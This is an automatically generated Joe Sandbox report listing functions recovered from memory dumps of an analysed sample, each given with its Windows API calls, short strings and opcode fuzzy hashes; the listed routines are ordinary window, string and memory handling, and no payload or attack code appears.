Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 3d94be51af7e819a6a5def82be0e086b27bd99855e7e965629bee2c507946819
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 78014EB244414ABBCF2A5E84CC41CEE3F72BB1C354F599416FA9858131D23AD9B1AB85

Function 0048B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0048B2E4
ScreenToClient.USER32(?,?), ref: 0048B2FC
ScreenToClient.USER32(?,?), ref: 0048B320
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0048B33B

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
Instruction ID: e0f35f64d62337ec24ef524e52db7040af9c6cc02db1932b8591958b9ea84988
Opcode Fuzzy Hash: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
Instruction Fuzzy Hash: B9117775D00209EFDB01DF99C444AEEBBF5FF18310F104566E914E3220D735AA558F94

Function 00466BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00466BE6

Part of subcall function 004676C4: _memset.LIBCMT ref: 004676F9

_memmove.LIBCMT ref: 00466C09
_memset.LIBCMT ref: 00466C16
LeaveCriticalSection.KERNEL32(?), ref: 00466C26

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
Instruction ID: 06c116e41b1fbc97defe022da98efa456519ca017efd3746de7cd937a477406a
Opcode Fuzzy Hash: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
Instruction Fuzzy Hash: ACF0547A200110BBCF016F56EC85A8ABF29EF45325F4480A9FE085E227D775E811CBB9

Function 00402218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00402231
SetTextColor.GDI32(?,000000FF), ref: 0040223B
SetBkMode.GDI32(?,00000001), ref: 00402250
GetStockObject.GDI32(00000005), ref: 00402258
GetWindowDC.USER32(?,00000000), ref: 0043BE83
GetPixel.GDI32(00000000,00000000,00000000), ref: 0043BE90
GetPixel.GDI32(00000000,?,00000000), ref: 0043BEA9
GetPixel.GDI32(00000000,00000000,?), ref: 0043BEC2
GetPixel.GDI32(00000000,?,?), ref: 0043BEE2
ReleaseDC.USER32(?,00000000), ref: 0043BEED

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
Instruction ID: 54194c7dea5641a5760446fc0b471bd43188e270dcc7ade6c1867ff591c8ccba
Opcode Fuzzy Hash: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
Instruction Fuzzy Hash: 8FE03932104244EADB215FA8EC4D7D93B10EB05332F10837AFB69980E187B54994DB16

Function 00458712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0045871B
OpenThreadToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458722
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004582E6), ref: 0045872F
OpenProcessToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458736

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
Instruction ID: 27e516f12521b82670cd12e73380cd235ac9fe5f10b87aab6d4880cb8d6f589a
Opcode Fuzzy Hash: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
Instruction Fuzzy Hash: 69E086366113119FD7205FB45D0CB5B3BACEF55792F244C3CB645D9051DA388449C754

Function 00406240 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON

Download Yara Rule

Strings

%I, xrefs: 0040624E

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID:
String ID: %I
API String ID: 0-63094095
Opcode ID: e9c0633a200649a430a81acd596a64955a70f18c5ba43c97e28f2c6008cd488f
Instruction ID: fc9b66e0bafda5900f64632d1c19c64e360ede111f7e08ffc6918f9b7723571d
Opcode Fuzzy Hash: e9c0633a200649a430a81acd596a64955a70f18c5ba43c97e28f2c6008cd488f
Instruction Fuzzy Hash: F7B19D759001099ACF24EF95C8819EEB7B5EF44314F11403BE942B72D1DB3C9AA6CB9E

Function 0047AEA2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON

Download Yara Rule

APIs

__itow_s.LIBCMT ref: 0047AFAE

Strings

xbL, xrefs: 0047B010
xbL, xrefs: 0047AFE4

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: __itow_s
String ID: xbL$xbL
API String ID: 3653519197-3351732020
Opcode ID: 0c6e0354c0013d4fee92ce69e041035a0e24d46cdf1018baf1def671b28a307b
Instruction ID: dfe480003ad9fd5cab9b7df9ebde8448aad3da8901d64dd9d19fd2ed475b7079
Opcode Fuzzy Hash: 0c6e0354c0013d4fee92ce69e041035a0e24d46cdf1018baf1def671b28a307b
Instruction Fuzzy Hash: DFB16E70A00105EFCB14DF55C890EEAB7B9EF58344F14C46AF949AB291EB38E941CB99

Function 00B8FAF0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 211COMMON

Download Yara Rule

Strings

pow, xrefs: 00B8FBF5, 00B8FC12

Memory Dump Source

Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd

Similarity

API ID:
String ID: pow
API String ID: 0-2276729525
Opcode ID: 32eddd0a66362894a2044272ade555a7dbf8a64bac749848bb59f41814e21b4b
Instruction ID: 17375c943f491bb0c76ee03285b07e394137fbe20093871bcb4d3d2008b26fd3
Opcode Fuzzy Hash: 32eddd0a66362894a2044272ade555a7dbf8a64bac749848bb59f41814e21b4b
Instruction Fuzzy Hash: 7F514961A0820797CF157B1CC94237A7BE0DB50750F208DF8E495822B9EF368DD5EB52

Function 0046AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9

Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC

__wcsnicmp.LIBCMT ref: 0046B02D
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0046B0F6

Strings

LPT, xrefs: 0046B027

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 0bf4b0a76cc3f132cb7bcf77adcf66fb9d1cefc0e8af144e1018bc7f00ea2780
Instruction ID: 83c5630e61c03cc96fa61f6b78faa4233f6e1162f12f5b466cba6b991e1c6364
Opcode Fuzzy Hash: 0bf4b0a76cc3f132cb7bcf77adcf66fb9d1cefc0e8af144e1018bc7f00ea2780
Instruction Fuzzy Hash: EF617475A00215AFCB14DF54C851EEEB7B4EF09350F10806AF916EB391E738AE85CB99

Function 00412957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00412968
GlobalMemoryStatusEx.KERNEL32(?), ref: 00412981

Strings

@, xrefs: 00412975

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
Instruction ID: a5a81f9d260a569e77baff687d6fe7a0f73e349ca0d117409dcb6840122a66be
Opcode Fuzzy Hash: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
Instruction Fuzzy Hash: CB5159B24187449BD320EF15D885BAFBBE8FB85344F41886DF2D8911A1DB74892CCB5A

Function 00440574 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0044057F

Strings

DdL, xrefs: 0040A317
DdL, xrefs: 0040A151

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ClearVariant
String ID: DdL$DdL
API String ID: 1473721057-91670653
Opcode ID: abc62f02c208a39630d7d904ffbed26d4982310498dda772250a92240196abd9
Instruction ID: 8cf85b897da21b35b232154f37a53a393289a03a8f02d27ab87a98346ee69310
Opcode Fuzzy Hash: abc62f02c208a39630d7d904ffbed26d4982310498dda772250a92240196abd9
Instruction Fuzzy Hash: 5D5113B86043019FD754DF18C580A1ABBF1BF99344F54886EE9859B3A1D339EC91CF4A

Function 0047258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0047259E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 004725D4

Strings

|, xrefs: 004725A5

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: cb178aac356a24ff43fec944d9add85da31ada705d33c094a362d2b69604a25d
Instruction ID: 4adfb47e446f893ace23fd506e663b8e952a67a31115c745ae406753cf5a670a
Opcode Fuzzy Hash: cb178aac356a24ff43fec944d9add85da31ada705d33c094a362d2b69604a25d
Instruction Fuzzy Hash: A5313871D00119ABCF11AFA1CC85EEEBFB8FF08344F10406AF918B6162DB756916DB65

Function 00486A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00486B17
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00486B53

Strings

static, xrefs: 00486AB3

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 352ac0ade79c08b1e3711c999f417e7e9207a04fdee643833d7e2eb5d5c32766
Instruction ID: c0acac3fdbca48a843832e92e86f2a53b54dc7fac4935119c3a772658612a1a1
Opcode Fuzzy Hash: 352ac0ade79c08b1e3711c999f417e7e9207a04fdee643833d7e2eb5d5c32766
Instruction Fuzzy Hash: B3318171100604AEDB10AF69CC41BFF73A9FF48754F11892EF9A5D7290DA34AC81CB68

Function 004628A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00462911
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0046294C

Strings

0, xrefs: 0046290A

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 54ef1e09961f951debfae4671dd413b71e0a8fc77559d8c19ec6c00eaf90e7d6
Instruction ID: 2b4b8058b7b01795732b14ccdc08f7f24d6d082f06cc36c2997a609d376c2748
Opcode Fuzzy Hash: 54ef1e09961f951debfae4671dd413b71e0a8fc77559d8c19ec6c00eaf90e7d6
Instruction Fuzzy Hash: BE31D871700705BBDB24DE48CE45BAFBBA4EF85350F14001AE881A6291E7B89948CB1B

Function 004866D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00486761
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0048676C

Strings

Combobox, xrefs: 0048672E

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
Instruction ID: 7937b7f8ceb80f7c2640562fc72fb2af059ad44b1fd006181b112b31544ba688
Opcode Fuzzy Hash: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
Instruction Fuzzy Hash: 9111B271200208AFEF51AF54DC81EAF376AEB48368F21092AF91897390D6399C5197A8

Function 00486C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91

GetWindowRect.USER32(00000000,?), ref: 00486C71
GetSysColor.USER32(00000012), ref: 00486C8B

Strings

static, xrefs: 00486C4E

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
Instruction ID: 619ac3c59cbe9074ca3f8c975c7c8c691f8bfa66afa20d6a6bf36cd90ef0372b
Opcode Fuzzy Hash: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
Instruction Fuzzy Hash: DC212CB2510209AFDF04EFA8CC45EEE7BA8FB08315F114A29FD55D2250D639E851DB64

Function 00486920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 004869A2
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004869B1

Strings

edit, xrefs: 00486986

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
Instruction ID: c4dc0b7ee3ea423f7e1eb401844c401eee0777dcbcb5b463cc5485c74a1bef4f
Opcode Fuzzy Hash: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
Instruction Fuzzy Hash: A711B2B1100104ABEF506F68DC40EEF3769EB05378F614B29F964972E0C739DC919758

Function 004629AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00462A22
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00462A41

Strings

0, xrefs: 00462A18

Memory Dump Source

